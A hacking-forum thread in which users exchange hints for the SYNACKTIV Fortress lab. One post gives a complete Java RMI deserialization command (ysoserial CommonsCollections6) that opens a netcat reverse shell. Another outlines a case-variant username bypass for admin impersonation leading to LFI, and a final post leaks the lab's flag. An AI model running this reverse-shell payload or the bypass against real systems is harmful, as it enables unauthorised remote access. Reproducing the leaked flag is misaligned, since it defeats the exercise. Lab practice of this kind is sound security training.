SYNACKTIV Fortress
by yivador274 - Monday January 8, 2024 at 09:18 AM
#1
Hi.

Could anybody give some hints to take 2nd flag - AcedDC?
I know it is about deserialization in monitoring srv. But i can't to craft right msg for that. (i already know token)
Reply
#2
(Jan 08, 2024, 09:58 AM)ElBakhaw Wrote: I don't remember 100% but I have this :

senddata()

proxychains -q java -jar rmg-4.4.1-jar-with-dependencies.jar serial 172.22.1.250 1099 --yso /opt/ysoserial.jar --bound-name monitoring --signature 'String sendData(String dummy,Object dummy2)' CommonsCollections6 'netcat ip port -e /bin/bash'

thx a lot. i did it.
Reply
#3
now I'am stuck after vpn connection. There is a very laggy squid. It's about some exploit on squid or not?
Reply
#4
Any hints for squid part?
Reply
#5
thx. I already did it yesterday.
so my previous question not actual already )
Reply
#6
Stuck on first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. can someone give me a hint plz?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#7
(Jan 16, 2024, 09:42 PM)fl00d777 Wrote: Stuck on first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. can someone give me a hint plz?
Yes you are right, you need to become elonmusk, on code analysis this fact stands out that new users cannot be elonmusk.

However, this string comparison also yields the vulnerabiliy, you can register as EloNMusK for example. This way you can also login with your new user and impersonate that user.

Then grab the admincontroller and analyze its code, you can see how ti downloads files... this way you can achieve LFI and leverage this for further enumeration.

And finally the flag.
Reply
#8
Hi,

Stuck after the second flag.

Done successfully the attack with java.
But stuck on the machine, couldn't find any interesting file or program.

can someone give me a nudge ?
Reply
#9
writeup:
https://gatogamer1155.github.io/fortress/synacktiv/
to open:
SYNACKTIV{S3Linux_1s_w@y_bett3r}
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,841 10 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,971 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 93,017 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,628 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,276 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)